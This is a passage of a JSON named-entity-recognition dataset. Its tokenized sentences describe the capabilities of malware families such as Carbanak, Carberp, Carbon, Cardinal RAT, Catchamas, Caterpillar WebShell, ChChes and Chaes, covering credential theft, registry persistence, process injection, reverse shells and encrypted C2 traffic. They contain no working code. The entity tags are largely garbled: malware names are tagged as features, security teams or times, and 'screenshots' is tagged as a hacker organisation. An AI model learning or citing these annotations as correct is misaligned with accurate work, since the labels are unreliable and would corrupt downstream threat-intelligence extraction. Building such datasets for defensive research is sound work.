"I-Features", "I-Features", "O" ] }, { "tokens": [ "Carbanak", "searches", "recursively", "for", "Outlook", "personal", "storage", "tables", "(PST)", "files", "within", "user", "directories", "and", "sends", "them", "back", "to", "the", "C2", "server." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carbanak", "obtains", "Windows", "logon", "password", "details." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carbanak", "encrypts", "strings", "to", "make", "analysis", "more", "difficult." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carbanak", "downloads", "an", "executable", "and", "injects", "it", "directly", "into", "a", "new", "process." ], "ner_tags": [ "B-Features", "B-Features", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carbanak", "lists", "running", "processes." ], "ner_tags": [ "B-Features", "O", "O", "O" ] }, { "tokens": [ "Carbanak", "checks", "the", "Registry", "key", "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet", "Settings</code>", "for", "proxy", "configurations", "information." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carbanak", "stores", "a", "configuration", "files", "in", "the", "startup", "directory", "to", "automatically", "execute", "commands", "in", "order", "to", "persist", "across", "reboots." ], "ner_tags": [ "B-Features", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carbanak", "has", "a", "plugin", "for", "VNC", "and", "Ammyy", "Admin", "Tool." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "B-Way", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "Carbanak", "enables", "concurrent", "Remote", "Desktop", "Protocol", "(RDP)", "sessions." ], "ner_tags": [ "B-Features", "O", "O", "B-Way", "I-Tool", "I-Tool", "B-Way", "O" ] }, { "tokens": [ "Carbanak", "performs", "desktop", "video", "recording", "and", "captures", "screenshots", "of", "the", "desktop", "and", "sends", "it", "to", "the", "C2", "server." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carbanak", "encodes", "the", "message", "body", "of", "HTTP", "traffic", "with", "Base64." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carbanak", "encrypts", "the", "message", "body", "of", "HTTP", "traffic", "with", "RC2", "(in", "CBC", "mode).", "Carbanak", "also", "uses", "XOR", "with", "random", "keys", "for", "its", "communications." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Idus" ] }, { "tokens": [ "The", "Carbanak", "malware", "communicates", "to", "its", "command", "server", "using", "HTTP", "with", "an", "encrypted", "payload." ], "ner_tags": [ "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Carbanak", "has", "a", "command", "to", "create", "a", "reverse", "shell." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carberp", "has", "queued", "an", "APC", "routine", "to", "explorer.exe", "by", "calling", "ZwQueueApcThread." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "B-Way" ] }, { "tokens": [ "Carberp", "has", "installed", "a", "bootkit", "on", "the", "system", "to", "maintain", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carberp", "has", "captured", "credentials", "when", "a", "user", "performs", "login", "through", "a", "SSL", "session." ], "ner_tags": [ "B-Way", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carberp", "has", "hooked", "several", "Windows", "API", "functions", "to", "steal", "credentials." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "Carberp's", "passw.plug", "plugin", "can", "gather", "account", "information", "from", "multiple", "instant", "messaging,", "email,", "and", "social", "media", "services,", "as", "well", "as", "FTP,", "VNC,", "and", "VPN", "clients." ], "ner_tags": [ "B-Way", "B-SamFile", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "B-Features", "O", "I-Idus", "I-Idus", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O" ] }, { "tokens": [ "Carberp's", "passw.plug", "plugin", "can", "gather", "passwords", "saved", "in", "Opera,", "Internet", "Explorer,", "Safari,", "Firefox,", "and", "Chrome." ], "ner_tags": [ "B-Way", "B-SamFile", "O", "O", "I-Features", "B-HackOrg", "O", "O", "B-Tool", "I-Tool", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Carberp", "has", "attempted", "to", "disable", "security", "software", "by", "creating", "a", "suspended", "process", "for", "the", "security", "software", "and", "injecting", "code", "to", "delete", "antivirus", "core", "files", "when", "the", "process", "is", "resumed." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carberp's", "bootkit", "can", "inject", "a", "malicious", "DLL", "into", "the", "address", "space", "of", "running", "processes." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carberp", "has", "used", "XOR-based", "encryption", "to", "mask", "C2", "server", "locations", "within", "the", "trojan." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carberp", "has", "exfiltrated", "data", "via", "HTTP", "to", "already", "established", "C2", "servers." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carberp", "has", "exploited", "multiple", "Windows", "vulnerabilities", "(CVE-2010-2743,", "CVE-2010-3338,", "CVE-2010-4398,", "CVE-2008-1084)", "and", "a", ".NET", "Runtime", "Optimization", "vulnerability", "for", "privilege", "escalation." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Features", "B-Features", "B-Features", "B-Features", "O", "O", "B-Way", "B-Tool", "B-SecTeam", "O", "O", "O", "O" ] }, { "tokens": [ "Carberp", "has", "created", "a", "hidden", "file", "in", "the", "Startup", "folder", "of", "the", "current", "user." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carberp", "can", "download", "and", "execute", "new", "plugins", "from", "the", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carberp", "has", "masqueraded", "as", "Windows", "system", "file", "names,", "as", "well", "as", "\"chkntfs.exe\"", "and", "\"syscron.exe\"." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "Carberp", "has", "used", "the", "NtQueryDirectoryFile", "and", "ZwQueryDirectoryFile", "functions", "to", "hide", "files", "and", "directories." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carberp", "has", "collected", "a", "list", "of", "running", "processes." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carberp", "has", "searched", "the", "Image", "File", "Execution", "Options", "registry", "key", "for", "\"Debugger\"", "within", "every", "subkey." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carberp", "has", "maintained", "persistence", "by", "placing", "itself", "inside", "the", "current", "user's", "startup", "folder." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carberp", "has", "used", "user", "mode", "rootkit", "techniques", "to", "remain", "hidden", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carberp", "can", "capture", "display", "screenshots", "with", "the", "screens_dll.dll", "plugin." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Carberp", "has", "queried", "the", "infected", "system's", "registry", "searching", "for", "specific", "registry", "keys", "associated", "with", "antivirus", "products." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carberp", "has", "collected", "the", "operating", "system", "version", "from", "the", "infected", "system." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carberp", "can", "start", "a", "remote", "VNC", "session", "by", "downloading", "a", "new", "plugin." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Carberp", "has", "removed", "various", "hooks", "before", "installing", "the", "trojan", "or", "bootkit", "to", "evade", "sandbox", "analysis", "or", "other", "analysis", "software." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carberp", "has", "connected", "to", "C2", "servers", "via", "HTTP." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Carbon", "has", "used", "RSA", "encryption", "for", "C2", "communications." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Carbon", "decrypts", "task", "and", "configuration", "files", "for", "execution." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "Carbon", "has", "a", "command", "to", "inject", "code", "into", "a", "process." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "Carbon", "uses", "HTTP", "to", "send", "data", "to", "the", "C2", "server." ], "ner_tags": [ "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carbon", "creates", "a", "base", "directory", "that", "contains", "the", "files", "and", "folders", "that", "are", "collected." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carbon", "uses", "TCP", "and", "UDP", "for", "C2." ], "ner_tags": [ "B-HackOrg", "O", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Carbon", "encrypts", "configuration", "files", "and", "tasks", "for", "the", "malware", "to", "complete", "using", "CAST-128", "algorithm." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Carbon", "uses", "the", "<code>net", "group</code>", "command." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carbon", "can", "list", "the", "processes", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Carbon", "enumerates", "values", "in", "the", "Registry." ], "ner_tags": [ "B-SecTeam", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carbon", "uses", "the", "<code>net", "view</code>", "command." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carbon", "creates", "several", "tasks", "for", "later", "execution", "to", "continue", "persistence", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carbon", "can", "collect", "the", "IP", "address", "of", "the", "victims", "and", "other", "computers", "on", "the", "network", "using", "the", "commands:", "<code>ipconfig", "-all</code>", "<code>nbtstat", "-n</code>,", "and", "<code>nbtstat", "-s</code>." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "Carbon", "uses", "the", "<code>netstat", "-r</code>", "and", "<code>netstat", "-an</code>", "commands." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Carbon", "uses", "the", "command", "<code>net", "time", "\\\\127.0.0.1</code>", "to", "get", "information", "the", "system’s", "time." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carbon", "can", "use", "HTTP", "in", "C2", "communications." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Carbon", "can", "use", "Pastebin", "to", "receive", "C2", "commands." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Carbon", "establishes", "persistence", "by", "creating", "a", "service", "and", "naming", "it", "based", "off", "the", "operating", "system", "version", "running", "on", "the", "current", "machine." ], "ner_tags": [ "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cardinal", "RAT", "applies", "compression", "to", "C2", "traffic", "using", "the", "ZLIB", "library." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cardinal", "RAT", "and", "its", "watchdog", "component", "are", "compiled", "and", "executed", "after", "being", "delivered", "to", "victims", "as", "embedded,", "uncompiled", "source", "code." ], "ner_tags": [ "B-Tool", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cardinal", "RAT", "decodes", "many", "of", "its", "artifacts", "and", "is", "decrypted", "(AES-128)", "after", "being", "downloaded." ], "ner_tags": [ "I-SecTeam", "I-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Cardinal", "RAT", "encodes", "many", "of", "its", "artifacts", "and", "is", "encrypted", "(AES-128)", "when", "downloaded." ], "ner_tags": [ "B-Tool", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "Cardinal", "RAT", "can", "communicate", "over", "multiple", "C2", "host", "and", "port", "combinations." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cardinal", "RAT", "can", "uninstall", "itself,", "including", "deleting", "its", "executable." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "B-Way", "B-Way", "O" ] }, { "tokens": [ "Cardinal", "RAT", "checks", "its", "current", "working", "directory", "upon", "execution", "and", "also", "contains", "watchdog", "functionality", "that", "ensures", "its", "executable", "is", "located", "in", "the", "correct", "path", "(else", "it", "will", "rewrite", "the", "payload)." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cardinal", "RAT", "can", "download", "and", "execute", "additional", "payloads." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "B-Features", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Cardinal", "RAT", "can", "log", "keystrokes." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Cardinal", "RAT", "lures", "victims", "into", "executing", "malicious", "macros", "embedded", "within", "Microsoft", "Excel", "documents." ], "ner_tags": [ "I-HackOrg", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O", "B-Way" ] }, { "tokens": [ "Cardinal", "RAT", "sets", "<code>HKCU\\Software\\Microsoft\\Windows", "NT\\CurrentVersion\\Windows\\Load</code>", "to", "point", "to", "its", "executable." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cardinal", "RAT", "contains", "watchdog", "functionality", "that", "ensures", "its", "process", "is", "always", "running,", "else", "spawns", "a", "new", "instance." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cardinal", "RAT", "injects", "into", "a", "newly", "spawned", "process", "created", "from", "a", "native", "Windows", "executable." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cardinal", "RAT", "can", "act", "as", "a", "reverse", "proxy." ], "ner_tags": [ "B-SamFile", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cardinal", "RAT", "contains", "watchdog", "functionality", "that", "periodically", "ensures", "<code>HKCU\\Software\\Microsoft\\Windows", "NT\\CurrentVersion\\Windows\\Load</code>", "is", "set", "to", "point", "to", "its", "executable." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cardinal", "RAT", "establishes", "Persistence", "by", "setting", "the", "<code>HKCU\\Software\\Microsoft\\Windows", "NT\\CurrentVersion\\Windows\\Load</code>", "Registry", "key", "to", "point", "to", "its", "executable." ], "ner_tags": [ "I-SecTeam", "I-SecTeam", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cardinal", "RAT", "can", "capture", "screenshots." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Cardinal", "RAT", "uses", "a", "secret", "key", "with", "a", "series", "of", "XOR", "and", "addition", "operations", "to", "encrypt", "C2", "traffic." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "Cardinal", "RAT", "can", "collect", "the", "hostname,", "Microsoft", "Windows", "version,", "and", "processor", "architecture", "from", "a", "victim", "machine." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cardinal", "RAT", "can", "collect", "the", "username", "from", "a", "victim", "machine." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cardinal", "RAT", "is", "downloaded", "using", "HTTP", "over", "port", "443." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Cardinal", "RAT", "can", "execute", "commands." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O" ] }, { "tokens": [ "Catchamas", "obtains", "application", "windows", "titles", "and", "then", "determines", "which", "windows", "to", "perform", "Screen", "Capture", "on." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Catchamas", "steals", "data", "stored", "in", "the", "clipboard." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Catchamas", "collects", "keystrokes", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Catchamas", "stores", "the", "gathered", "data", "from", "the", "machine", "in", ".db", "files", "and", ".bmp", "files", "under", "four", "separate", "locations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Catchamas", "adds", "a", "new", "service", "named", "NetAdapter", "in", "an", "apparent", "attempt", "to", "masquerade", "as", "a", "legitimate", "service." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Catchamas", "creates", "three", "Registry", "keys", "to", "establish", "persistence", "by", "adding", "a", "Windows", "Service." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Tool", "O" ] }, { "tokens": [ "Catchamas", "captures", "screenshots", "based", "on", "specific", "keywords", "in", "the", "window’s", "title." ], "ner_tags": [ "B-SamFile", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Catchamas", "gathers", "the", "Mac", "address,", "IP", "address,", "and", "the", "network", "adapter", "information", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Catchamas", "adds", "a", "new", "service", "named", "NetAdapter", "to", "establish", "persistence." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Caterpillar", "WebShell", "has", "a", "module", "to", "perform", "brute", "force", "attacks", "on", "a", "system." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "B-Org", "I-OffAct", "I-OffAct", "O", "O", "O" ] }, { "tokens": [ "Caterpillar", "WebShell", "has", "a", "module", "to", "collect", "information", "from", "the", "local", "database." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Caterpillar", "WebShell", "can", "upload", "files", "over", "the", "C2", "channel." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Caterpillar", "WebShell", "can", "search", "for", "files", "in", "directories." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "I-Features", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "Caterpillar", "WebShell", "has", "a", "module", "to", "download", "and", "upload", "files", "to", "the", "system." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "B-Features", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Caterpillar", "WebShell", "can", "obtain", "a", "list", "of", "local", "groups", "of", "users", "from", "a", "system." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "I-Features", "I-Features", "I-Features", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Caterpillar", "WebShell", "has", "a", "command", "to", "modify", "a", "Registry", "key." ], "ner_tags": [ "B-Way", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Caterpillar", "WebShell", "has", "a", "module", "to", "use", "a", "port", "scanner", "on", "a", "system." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "B-Tool", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Caterpillar", "WebShell", "can", "gather", "a", "list", "of", "processes", "running", "on", "the", "machine." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Caterpillar", "WebShell", "has", "a", "module", "to", "use", "a", "rootkit", "on", "a", "system." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Caterpillar", "WebShell", "has", "a", "module", "to", "gather", "information", "from", "the", "compromrised", "asset,", "including", "the", "computer", "version,", "computer", "name,", "IIS", "version,", "and", "more." ], "ner_tags": [ "B-Way", "B-SecTeam", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Caterpillar", "WebShell", "can", "gather", "the", "IP", "address", "from", "the", "victim's", "machine", "using", "the", "IP", "config", "command." ], "ner_tags": [ "B-Way", "B-SecTeam", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Caterpillar", "WebShell", "can", "obtain", "a", "list", "of", "user", "accounts", "from", "a", "victim's", "machine." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "I-Features", "I-Features", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Caterpillar", "WebShell", "can", "obtain", "a", "list", "of", "the", "services", "from", "a", "system." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "I-Features", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Caterpillar", "WebShell", "can", "run", "commands", "on", "the", "compromised", "asset", "with", "CMD", "functions." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ChChes", "samples", "were", "digitally", "signed", "with", "a", "certificate", "originally", "used", "by", "Hacking", "Team", "that", "was", "later", "leaked", "and", "subsequently", "revoked." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ChChes", "steals", "credentials", "stored", "inside", "Internet", "Explorer." ], "ner_tags": [ "B-Way", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "ChChes", "can", "alter", "the", "victim's", "proxy", "configuration." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ChChes", "collects", "the", "victim's", "%TEMP%", "directory", "path", "and", "version", "of", "Internet", "Explorer." ], "ner_tags": [ "B-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ChChes", "is", "capable", "of", "downloading", "files,", "including", "additional", "modules." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "ChChes", "copies", "itself", "to", "an", ".exe", "file", "with", "a", "filename", "that", "is", "likely", "intended", "to", "imitate", "Norton", "Antivirus", "but", "has", "several", "letters", "reversed", "(e.g.", "notron.exe)." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "ChChes", "collects", "its", "process", "identifier", "(PID)", "on", "the", "victim." ], "ner_tags": [ "B-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ChChes", "establishes", "persistence", "by", "adding", "a", "Registry", "Run", "key." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ChChes", "can", "encode", "C2", "data", "with", "a", "custom", "technique", "that", "utilizes", "Base64." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "ChChes", "can", "encrypt", "C2", "traffic", "with", "AES", "or", "RC4." ], "ner_tags": [ "B-Way", "O", "B-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "ChChes", "collects", "the", "victim", "hostname,", "window", "resolution,", "and", "Microsoft", "Windows", "version." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ChChes", "communicates", "to", "its", "C2", "server", "over", "HTTP", "and", "embeds", "data", "within", "the", "Cookie", "HTTP", "header." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Features", "O", "O", "O", "B-Tool", "B-Tool", "O" ] }, { "tokens": [ "Chaes", "has", "used", "the", "Puppeteer", "module", "to", "hook", "and", "monitor", "the", "Chrome", "web", "browser", "to", "collect", "user", "information", "from", "infected", "hosts." ], "ner_tags": [ "B-Time", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chaes", "can", "steal", "login", "credentials", "and", "stored", "financial", "information", "from", "the", "browser." ], "ner_tags": [ "B-Idus", "O", "I-Purp", "B-SamFile", "B-Purp", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chaes", "has", "used", "search", "order", "hijacking", "to", "load", "a", "malicious", "DLL." ], "ner_tags": [ "B-Time", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "B-Way", "B-Way" ] }, 